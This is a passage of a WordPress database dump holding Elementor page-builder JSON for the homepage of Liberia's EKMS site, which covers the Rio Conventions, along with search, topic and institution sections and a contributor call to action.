team\",\"btn_link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/contribute\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"icon\":\"fa fa-angle-double-right\",\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"title_color\":\"#006400\",\"description_color\":\"#ffffff\",\"button_background_color\":\"#006400\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"oew-call-to-action\"}],\"isInner\":false}],\"isInner\":false}]'),(13170,2135,'_elementor_version','2.7.5'),(13171,2135,'_elementor_template_type','wp-page'),(13172,2135,'_elementor_page_settings','a:1:{s:21:\"background_background\";s:7:\"classic\";}'),(13175,2136,'_wp_page_template','default'),(13176,2136,'_elementor_edit_mode','builder'),(13177,2136,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"slideshow\",\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"rgba(255,255,255,0.78)\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5500000000000000444089209850062616169452667236328125},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"background_slideshow_gallery\":[{\"id\":2035,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_epa.jpg\"},{\"id\":2036,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home1.jpg\"},{\"id\":2037,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home2.jpg\"},{\"id\":2038,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home3.jpg\"},{\"id\":2039,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_maps.jpg\"}],\"background_slideshow_ken_burns_zoom_direction\":\"out\"},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":55},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25},\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"900\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The EKMS provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Topics, Institutions and Documents.<\\/p>\",\"align\":\"center\",\"text_color\":\"#ffffff\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":29,\"sizes\":[]},\"typography_font_weight\":\"900\",\"typography_font_family\":\"Roboto\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"Entire Resource\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\",\"search_taxonomy\":\"resource_type\"},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Knowledge Resources\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_topic\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Topics\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-topics\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore Government and Other Institutions that have direct linkages with environmental policies and development.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Documents\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore the EKMS Document Database.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Documents\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-and-other-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"876ae3f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"81fa289\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9f9c8b3\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8aa33ed\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"db429d4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#002600\",\"shape_divider_bottom_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"shape_divider_bottom_height\":{\"unit\":\"px\",\"size\":82,\"sizes\":[]},\"shape_divider_bottom_flip\":\"yes\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a37cd7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Multilateral Environmental Agreements\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"49af793\",\"elType\":\"widget\",\"settings\":{\"items_list\":[{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_cbd-1.jpg\",\"id\":1854},\"item_title\":\"UNCBD\",\"item_text\":\"The United Nations Convention on Biological Diversity\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-convention-on-biological-diversity\\/\",\"item_link_target\":\"\",\"_id\":\"7311fcf\",\"item_content_type\":\"default\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\"},{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_fccc.jpg\",\"id\":1856},\"item_content_type\":\"default\",\"item_title\":\"UNFCCC\",\"item_text\":\"The United Nations Framework Convention on Climate Change\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-framework-convention-on-climate-change\\/\",\"item_link_target\":\"\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\",\"_id\":\"8abca95\"},{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_ccd.jpg\",\"id\":1855},\"item_content_type\":\"default\",\"item_title\":\"UNCCD\",\"item_text\":\"The United Nations Convention to Combat Desertification\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-convention-to-combat-desertification\\/\",\"item_link_target\":\"\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\",\"_id\":\"6b2d2f2\"}],\"item_layout\":\"banners\",\"animation_effect\":\"sarah\",\"img_size\":\"medium\",\"title_html_tag\":\"h6\",\"equal_height_cols\":\"true\",\"slides_to_scroll\":\"3\",\"pause_on_hover\":\"true\",\"autoplay_speed\":2500,\"centered\":\"true\",\"background_background\":\"classic\",\"normal_opacity\":0.40000000000000002220446049250313080847263336181640625,\"hover_opacity\":0.59999999999999997779553950749686919152736663818359375,\"items_title_color\":\"#ffffff\",\"items_title_typography_typography\":\"custom\",\"items_title_typography_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"items_title_typography_font_weight\":\"900\",\"items_title_typography_letter_spacing\":{\"unit\":\"px\",\"size\":2.5,\"sizes\":[]},\"items_text_color\":\"#009ee2\",\"items_text_typography_typography\":\"custom\",\"items_text_typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"items_text_typography_font_weight\":\"700\",\"slides_to_show\":\"3\"},\"elements\":[],\"widgetType\":\"jet-carousel\"},{\"id\":\"c151e2c\",\"elType\":\"widget\",\"settings\":{\"text\":\"View All Agreements\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/multilateral-environmental-agreements\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d48ccf5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0881e40\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"290555e\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"533b1b7\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a8f2e29\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#000000\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"30\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":true}},\"elements\":[{\"id\":\"46a8277\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8076ded\",\"elType\":\"widget\",\"settings\":{\"title\":\"Start Contributing to the EKMS\",\"description\":\"Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\",\"btn_text\":\"Join the team\",\"btn_link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/contribute\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"icon\":\"fa fa-angle-double-right\",\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"title_color\":\"#006400\",\"description_color\":\"#ffffff\",\"button_background_color\":\"#006400\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"oew-call-to-action\"}],\"isInner\":false}],\"isInner\":false}]'),(13178,2136,'_elementor_version','2.7.5'),(13179,2136,'_elementor_template_type','wp-page'),(13180,2136,'_elementor_page_settings','a:1:{s:21:\"background_background\";s:7:\"classic\";}'),(13182,2137,'_wp_page_template','default'),(13183,2137,'_elementor_edit_mode','builder'),(13184,2137,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"slideshow\",\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"rgba(255,255,255,0.78)\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5500000000000000444089209850062616169452667236328125},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"background_slideshow_gallery\":[{\"id\":2035,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_epa.jpg\"},{\"id\":2036,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home1.jpg\"},{\"id\":2037,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home2.jpg\"},{\"id\":2038,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home3.jpg\"},{\"id\":2039,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_maps.jpg\"}],\"background_slideshow_ken_burns_zoom_direction\":\"out\"},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"se